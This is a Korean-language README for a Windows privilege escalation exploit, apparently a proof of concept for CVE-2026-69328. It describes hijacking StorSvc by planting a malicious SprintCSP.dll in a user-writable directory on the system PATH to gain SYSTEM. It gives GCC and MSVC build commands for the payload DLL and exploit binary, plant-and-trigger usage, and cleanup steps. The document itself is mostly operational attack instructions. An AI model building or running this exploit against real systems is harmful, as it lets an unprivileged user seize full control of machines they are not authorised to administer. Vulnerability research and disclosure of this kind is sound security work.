
Windows 권한 상승 익스플로잇으로, 사용자가 쓰기 가능한 HKLM PATH 디렉터리에 SprintCSP.dll을 심어 StorSvc를 하이재킹하고 SYSTEM 권한으로 실행합니다.
StorSvc는 SYSTEM 권한으로 SprintCSP.dll을 상대 이름으로 로드합니다. 사용자가 쓸 수 있는 HKLM PATH 디렉터리에 이 DLL을 심으면 SYSTEM 권한을 얻습니다.
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment\Path에 사용자가 쓸 수 있는 디렉터리가 필요합니다.
깨끗한 이미지에는 없습니다. 툴링 설치 프로그램이 추가합니다 (%USERPROFILE%\.cargo\bin, .local\bin, Python Scripts). 해당 디렉터리가 없으면 CVE-2026-69328.exe --setup이 하나를 생성하며, 이때 일회성 관리자 프롬프트가 필요합니다. 익스플로잇 자체는 관리자 권한이 전혀 필요하지 않습니다.
GCC:
gcc payload.c -shared -o SprintCSP.dll
gcc CVE-2026-69328.c -lrpcrt4 -ladvapi32 -lshell32 -o CVE-2026-69328.exe
MSVC:
cl /LD payload.c /Fe:SprintCSP.dll
cl CVE-2026-69328.c rpcrt4.lib advapi32.lib shell32.lib /Fe:CVE-2026-69328.exe
CVE-2026-69328.exe plant, trigger, read proof
CVE-2026-69328.exe --cleanup remove proof file + planted DLL
증명 파일은 C:\Windows\System32\CVE-2026-69328.txt에 생성됩니다.
StorSvc는 로드 후 충돌하고 SCM이 약 120초 후에 다시 시작합니다.